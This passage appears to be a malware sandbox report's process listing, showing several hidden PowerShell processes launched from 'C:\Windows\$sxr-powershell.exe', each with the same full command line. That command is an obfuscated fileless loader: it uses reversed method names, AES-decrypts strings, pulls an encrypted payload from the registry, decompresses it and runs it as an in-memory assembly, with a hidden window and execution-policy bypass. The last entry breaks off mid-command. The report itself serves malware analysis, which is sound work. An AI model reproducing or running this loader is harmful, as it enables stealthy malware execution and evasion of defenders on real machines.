        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6092).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        
        PID:4456
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6092).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        
        PID:8520
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6092).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        Hide Artifacts: Hidden Window
        
        PID:8784
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6092).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = 